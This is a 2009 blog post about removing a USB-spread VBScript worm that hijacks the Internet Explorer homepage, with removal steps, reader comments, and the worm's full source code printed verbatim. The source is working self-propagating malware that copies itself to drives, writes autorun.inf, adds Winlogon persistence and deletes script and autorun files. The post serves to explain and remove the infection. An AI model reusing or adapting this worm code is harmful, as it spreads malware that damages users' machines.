Saturday, January 3, 2009

Easy Removal of RAHUL THE H@CkEr worm

A new worm seems to have made its way into my system via a pen drive. The worm changed my homepage to a rogue site "http://WWW.RAHULHACKINGARTICLE.WETPAINT.COM" and added "RAHUL THE H@CkEr" in place of Microsoft Internet Explorer in the title bar. The only harm that could be identified is the changing of the homepage permanently to a rogue link.

The great wonder that i discovered while going through the source code is this worm actually deleted few other common threats that spread through the pen drive. So probably the intention of Rahul the Hacker was good? but then why set the homepage to a rogue link permanently?
My antivirus is outdated and was not able to remove it.
  • To easily remove the worm loginto windows in safe mode.You can goto windows safe mode by hitting the F8 button continuoulsy when the windows 98 or XP OS boots up.
  • After logging into windows in safe mode, goto task manager by pressing Ctrl+Alt+Delete.
  • Select Wscript.exe and click on end task.
  • Search and delete the files with the name "LOVERAHULSAS".
  • After having deleted the script file make sure the source pen drive is formated. Restart in normal mode.
    These steps will make it possible to set the homepage to anything required by you.
    All the traces of the worm can be removed by deleting the entry for "RAHUL THE H@CkEr" using "HiJackThis_v2".
    I got the entire source code of the worm after removing, its given below:
    Source of LOVERAHULSAS.vbs
    'THIS IS AN ANTI VIRUS WHICH WILL WORK AS ##'A VIRUS AND WILL ONLY REPAIR YOUR WINDOWS#'AND WONT DO ANY HARM ''HACK THE WORLD'RAHUL THE H@CkEr'@FB1-INNOVATIONS RULEZZZ'LOVERAHULSAS@GMAIL.COM'http://WWW.RAHULHACKINGARTICLE.WETPAINT.COMOption ExplicitOn Error Resume Next
    Dim FOBJ,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,files,Delete,auto,rootDim alertSet FOBJ = CreateObject("Scripting.FileSystemObject")Set Shells = CreateObject("Wscript.Shell")Set WinDir = FOBJ.GetSpecialFolder(0)Set SystemDir =FOBJ.GetSpecialFolder(1)Set File = FOBJ.GetFile(WScript.ScriptFullName)Set Drv = File.DriveSet InDrive = FOBJ.drivesSet ReadAll = File.OpenAsTextStream(1,-2)do while not ReadAll.atendofstreamAllFile = AllFile & ReadAll.readlineAllFile = AllFile & vbcrlfLoop
    Count=Drv.DriveType
    Do If Not FOBJ.FileExists(SystemDir & "\LOVERAHULSAS.vbs") then set WriteAll = FOBJ.CreateTextFile(SystemDir & "\LOVERAHULSAS.vbs",2,true) WriteAll.Write AllFile WriteAll.close set WriteAll = Fso.GetFile(SystemDir & "\LOVERAHULSAS.vbs") WriteAll.Attributes = -1alert =MsgBox("THIS IS AN ANTI-VIRUS AND WILL HELP YOUR SYSTEM TO WORK PROPERLY", 4096,"RAHUL THE H@CkEr")
    End If
    Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","RAHUL THE H@CkeR" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD" Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.rahulhackingarticle.wetpaint.com/" Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe" Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _ SystemDir & "\wscript.exe " & SystemDir & "\LOVERAHULSAS.VBS" For Each Drives In InDrive root = Drives.Path & "\" If FOBJ.GetParentFolderName(WScript.ScriptFullName)=root Then Shells.Run "explorer.exe " & root End If Set folder=FOBJ.GetFolder(root) Set Delete = FOBJ.DeleteFile(SystemDir & "\killvbs.vbs",true)Set Delete = FOBJ.DeleteFile(SystemDir & "\virusremoval.vbs",true) For Each files In folder.Files auto=Left(files.Name,7) If UCase(auto)=UCase("autorun") Then Set Delete = FOBJ.DeleteFile(root & files.Name,true) End If Next If Drives.DriveType=2 Then delext "inf",Drives.Path & "\" delext "INF",Drives.Path & "\" End if
    If Drives.DriveType = 1 Or Drives.DriveType = 2 Then If Drives.Path<> "A:" Then delext "vbs",WinDir & "\" delext "vbs",Drives.Path & "\" If FOBJ.FileExists(Drives.Path & "\ravmon.exe") Then Fso.DeleteFile(Drives.Path & "\ravmon.exe") End If If FOBJ.FileExists(Drives.Path & "\sxs.exe") Then Fso.DeleteFile(Drives.Path & "\sxs.exe") End If If FOBJ.FileExists(Drives.Path & "\winfile.exe") Then FOBJ.DeleteFile(Drives.Path & "\winfile.exe") End If If FOBJ.FileExists(Drives.Path & "\run.wsh") Then FOBJ.DeleteFile(Drives.Path & "\run.wsh") End If If Drives.DriveType = 1 Then If Drives.Path<>"A:" Then
    If Not FOBJ.FileExists(Drives.Path & "\LOVERAHULSAS.vbs") Then Set WriteAll=FOBJ.CreateTextFile(Drives.Path & "\LOVERAHULSAS.vbs",2,True) WriteAll.Write AllFile WriteAll.Close Set WriteAll = FOBJ.GetFile(Drives.Path & "\LOVERAHULSAS.vbs") WriteAll.Attributes = -1 End If If FOBJ.FileExists(Drives.Path & "\autorun.inf") Or FOBJ.FileExists(Drives.Path & "\AUTORUN.INF") Then Set Chg = FOBJ.GetFile(Drives.Path & "\autorun.inf") Chg.Attributes = -8 Set WriteAll = FOBJ.CreateTextFile(Drives.Path & "\autorun.inf",2,True) WriteAll.writeline "[autorun]" WriteAll.WriteLine "open=wscript.exe LOVERAHULSAS.vbs" WriteAll.WriteLine "shell\open=Open" WriteAll.WriteLine "shell\open\Command=wscript.exe LOVERAHULSAS.vbs" WriteAll.Close Set WriteAll = FOBJ.GetFile(Drives.Path & "\autorun.inf") WriteAll.Attributes = -1 else Set WriteAll = FOBJ.CreateTextFile(Drives.Path & "\autorun.inf",2,True) WriteAll.writeline "[autorun]" WriteAll.WriteLine "open=wscript.exe LOVERAHULSAS.vbs" WriteAll.WriteLine "shell\open=Open" WriteAll.WriteLine "shell\open\Command=wscript.exe LOVERAHULSAS.vbs" WriteAll.Close Set WriteAll = FOBJ.GetFile(Drives.Path & "\autorun.inf") WriteAll.Attributes = -1 End if End If End If End if End If Next
    if Count <> 1 then Wscript.sleep 1000 end ifloop while Count<>1
    sub delext(File2Find, SrchPath) Dim oFileSys, oFolder, oFile,Cut,Delete Set oFileSys = CreateObject("Scripting.FileSystemObject") Set oFolder = oFileSys.GetFolder(SrchPath) For Each oFile In oFolder.Files Cut=Right(oFile.Name,3) If UCase(Cut)=UCase(file2find) Then If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true) End If NextEnd sub
    Content of autorun.ini
    [autorun]open=wscript.exe LOVERAHULSAS.vbsshell\open=Openshell\open\Command=wscript.exe LOVERAHULSAS.vbs

8 comments:

Vijay said...

could you please tell me the language used for writing this code.

Indra Teja said...

when i started in safe mode and i pressed ctrl+alt+del and theres no Wscript.exe task running and i searced my whole computer theres no file with the name LOVERAHULSAS and when ever i boot my comp i see a window cannot find c:windows/system32/LOVERAHULSAS.vbs plz help me how cud i fix it

Indra Teja said...

when i started in safe mode and i pressed ctrl+alt+del and theres no Wscript.exe task running and i searced my whole computer theres no file with the name LOVERAHULSAS and when ever i boot my comp i see a window cannot find c:windows/system32/LOVERAHULSAS.vbs plz help me how cud i fix it

Indra Teja said...

Please help me with this problem i really got fed up with this......

AG said...

@ Indra Teja
Just follow the steps after the step you tried. Use Hijack 2 to remove the entries. This will solve your problem.

Indra Teja said...

yeah plz tell me how you use hijack 2 and wt is it??

Indra Teja said...

i cannot install any thing like my winmap player is not no working and i uninstalled it and again i tried to install it but i cannt

AG said...

@ Indra Tej,

First get and install a good anitvirus and run a full system scan to remove all virus.If you cant even install anti-virus, attach your hard disk to a system that has anti-virus installed and get it scanned.

For info about Hijack this-- you can read below link.
http://www.bleepingcomputer.com/tutorials/tutorial42.html

If you are not sure what you are doing, it might be better to contact a professional.